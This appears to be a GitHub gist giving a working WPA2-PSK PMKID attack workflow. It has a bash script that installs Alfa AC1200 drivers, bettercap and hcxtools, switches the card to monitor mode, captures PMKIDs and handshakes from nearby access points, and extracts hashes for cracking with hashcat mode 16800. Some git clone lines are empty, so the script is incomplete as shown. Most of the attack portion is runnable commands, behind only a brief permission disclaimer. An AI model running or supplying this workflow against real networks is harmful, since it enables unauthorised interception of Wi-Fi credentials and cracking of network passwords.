Skip to content

Instantly share code, notes, and snippets.

Last active Jan 18, 2022
What would you like to do?
WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200

WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200


This short post goes over the workflow I use for the PMKID attack using an Alfa AC1200 (AWUS036ACH) card with a bootable Kali USB and bettercap + hcxdumptool. I have noticed more results using hcxdumptool compared to wifi.assoc all in bettercap, but I still prefer to view and log the output in bettercap, so this workflow helps make the most of both tools.

There's plenty out there about this attack (see resources at bottom), so nothing particularly novel here. As always, you must only execute this workflow on networks where you have permission.


  1. Laptop
  2. Kali Live USB
  3. Alfa AC1200 (AWUS036ACH)


  1. Boot into Kali.
  2. Connect to a network with Internet access to download packages.
  3. Execute script.
  4. Ensure that the card is connected when prompted.
  5. Confirm that card is running in monitor mode with iwconfig.

Capturing Hashes

  1. Execute script.
  2. When complete, enter; wifi.recon off; q in bettercap.
  3. When script is finished, it will list all APs where PMKIDs were captured.
  4. Hashes will be found in the *.pmkid.txt files.
  5. Session logs will be found in the *-session_{TOOL}.log files.

Cracking Hashes

  1. Use hashcat with mode 16800, e.g. hashcat -m16800 hashes.txt wordlist.txt --show --force.


# Install AWUS036ACH drivers.
apt update
apt --yes install realtek-rtl88xxau-dkms
# Install Bettercap.
apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p /opt/bettercap
cd /opt/bettercap
# Install hcxtools.
apt update
kill `lsof /var/lib/dpkg/lock-frontend | tail -1 | awk '{print $2}'`
apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
cd /opt
git clone
git clone
cd /opt/hcxdumptool
make install
cd /opt/hcxtools
make install
# Plugin AWUS036ACH.
read -p "Connect the AWUS036ACH, then press [ENTER]..."
service network-manager stop
killall wpa_supplicant
sleep 2
ip link set wlan1 down
sleep 2
iwconfig wlan1 mode monitor
sleep 2
ip link set wlan1 up
mkdir -p ~/captures/
cd ~/captures/
hcxdumptool -i wlan1 -o "$(date +%Y%m%d_%H%M%S)-handshakes_hcxdumptool.pcapng" --enable_status=1 | tee "$(date +%Y%m%d_%H%M%S)-session_hcxdumptool.log" &
sleep 1
/opt/bettercap/bettercap -iface wlan1 -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore; set wifi.handshakes.file $(date +%Y%m%d_%H%M%S)-handshakes_bettercap.pcap; set false; wifi.recon on" | tee "$(date +%Y%m%d_%H%M%S)-session_bettercap.log"
sleep 1
killall hcxdumptool
sleep 2
echo "Extracting PMKID hashes from PCAP files..."
for pcap_file in $(ls -1 *.pcap*); do
hcxpcapngtool -o "$pcap_file.pmkid.txt" "$pcap_file"
echo "PMKIDs captured for the following APs:"
python -c "import glob, binascii, pprint; pprint.pprint(set([binascii.unhexlify(line.split('*')[-4]) for line in sum([open(hcf).read().splitlines() for hcf in glob.glob('*.pmkid.txt')], [])]))"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment